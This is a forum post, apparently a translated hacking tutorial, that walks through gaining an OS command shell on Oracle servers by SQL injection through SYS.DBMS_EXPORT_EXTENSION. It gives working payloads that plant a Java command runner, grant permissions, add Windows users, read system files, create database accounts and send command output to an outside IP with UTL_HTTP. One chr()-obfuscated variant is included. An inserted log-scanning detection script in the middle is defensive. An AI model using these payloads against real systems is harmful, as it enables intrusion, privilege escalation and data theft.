A step-by-step demonstration of obtaining a cmdshell through Oracle injection

Posted on 2012-12-18 12:21:48 (thread starter)
All of the demonstrations below were run in SQL Plus over the web. For web injection, rewrite "select SYS.DBMS_EXPORT_EXTENSION....." into the form
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
(the 'a'|| is there so that the statement returns true).
The statement is rather long, so it may have to be submitted via POST.
The individual steps are as follows:
1. Create the package
By injecting the SYS.DBMS_EXPORT_EXTENSION function, create a Java package named LinxUtil on the Oracle server. It contains two functions: runCMD, which executes system commands, and readFile, which reads files:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
------------------------
If the URL has a length limit, the readFile() function block can be removed, i.e.:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
Also remove the statements that handle readFile() in the later steps.
------------------------------
2. Grant Java permissions
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3. Create the functions
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4. Grant public execute permission on the functions
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5. Test whether the steps above succeeded
and '1'<>'11'||(
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
)
and '1'<>(
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
)
6. Execute commands:
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
)
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxReadFile('c:/boot.ini') from dual
)

Note that sys.LinxReadFile() returns a varchar, so "and 1<>" cannot be used in place of "and '1'<>".
To see the result of the command, use union:
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
or UTL_HTTP.request():
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
)
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
)
Note: when using UTL_HTTP.request, use REPLACE() to substitute the spaces and newlines, otherwise the HTTP request cannot be submitted. utl_encode.base64_encode also works.
--------------------
6. Internal changes
The changes to the all_objects table can be inspected with the following command:
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
7. Delete the functions we created
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
====================================================
End of article. Dedicated to my friends.
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
Another way to test for the vulnerability:
Create an Oracle account:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
That is:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
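From the defender's side, both the plain DBMS_EXPORT_EXTENSION requests in the steps above and the chr()-encoded variant just shown leave recognisable strings in web-server access logs. The Python script below is an added example, not part of the original post: it URL-decodes each log line, collapses chr(n)||chr(n) chains back into the text they build so that encoding the arguments does not hide the PL/SQL keywords, and reports which signatures each request matched. The sample log lines, the documentation address 203.0.113.7 and the signature list are all constructed here.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the original post): a benign request, the
# plain DBMS_EXPORT_EXTENSION payload, the same call with "EXECUTE IMMEDIATE"
# chr()-encoded, and a UTL_HTTP request. 203.0.113.7 is a documentation address.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Dec/2012:12:21:48 +0800] "GET /xxx.jsp?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [18/Dec/2012:12:22:01 +0800] "GET /xxx.jsp?id=1%20and%20%271%27%3C%3E%27a%27||'
    '(select%20SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(%27FOO%27,%27BAR%27,'
    '%27DBMS_OUTPUT%22.PUT(1);EXECUTE%20IMMEDIATE%20...) HTTP/1.1" 200 512',
    '10.0.0.9 - - [18/Dec/2012:12:23:10 +0800] "GET /xxx.jsp?id=1%20and%201%3C%3E(select%20'
    'SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),'
    'chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||'
    'chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)...) HTTP/1.1" 500 0',
    '10.0.0.9 - - [18/Dec/2012:12:24:30 +0800] "GET /xxx.jsp?id=1%20and%20%271%27%3C%3E(SELECT%20'
    'UTL_HTTP.request(%27http://203.0.113.7/record.php%27)%20FROM%20dual) HTTP/1.1" 200 512',
]

# Strings taken from the payloads on this page. They are compared after URL-decoding,
# chr()-chain decoding and upper-casing, so case or %-encoding alone cannot hide them.
SIGNATURES = ("DBMS_EXPORT_EXTENSION", "GET_DOMAIN_INDEX_TABLES", "EXECUTE IMMEDIATE",
              "DBMS_JAVA.GRANT_PERMISSION", "UTL_HTTP.REQUEST", "LANGUAGE JAVA NAME")

# A run of chr(n) terms joined by ||; the lookahead keeps a || that joins a non-chr() term.
CHR_CHAIN = re.compile(r"(?:chr\(\d+\)(?:\s*\|\|\s*(?=chr\())?)+", re.IGNORECASE)
CHR_JOIN = re.compile(r"chr\(\d+\)\s*\|\|\s*chr\(", re.IGNORECASE)

def decode_chr_chains(text):
    """Replace every chr(n)||chr(n)... chain with the string it concatenates to."""
    def build(match):
        codes = re.findall(r"chr\((\d+)\)", match.group(0), re.IGNORECASE)
        return "".join(chr(int(c)) for c in codes)
    return CHR_CHAIN.sub(build, text)

def scan_line(line):
    """Return the signatures found in one log line, in SIGNATURES order ([] if clean)."""
    decoded = unquote_plus(line)
    normalised = decode_chr_chains(decoded).upper()
    hits = [sig for sig in SIGNATURES if sig in normalised]
    if CHR_JOIN.search(decoded):
        hits.append("CHR-ENCODED-STRING")  # the obfuscation itself is a signal
    return hits

def scan_log(lines):
    """Return (line_number, hits) for every line that matches at least one signature."""
    return [(n, hits) for n, line in enumerate(lines, 1) if (hits := scan_line(line))]
```

Running scan_log over a real access log would flag lines 2 to 4 of the sample here; the chr()-encoded request is reported both for the decoded "EXECUTE IMMEDIATE" and for the encoding itself.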
Confirm that the vulnerability exists:
1<>(
select user_id from all_users where username='LINXSQL'
)
Grant linxsql the connect privilege:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
Delete the account:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
The following method creates a function Linx_query() that can execute arbitrary statements; on success it returns the number 1. Its privileges are inherited, however, and may amount to no more than public privileges, so it seems of little use; if you really want to use it, consider "grant dba to" the current user:
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
)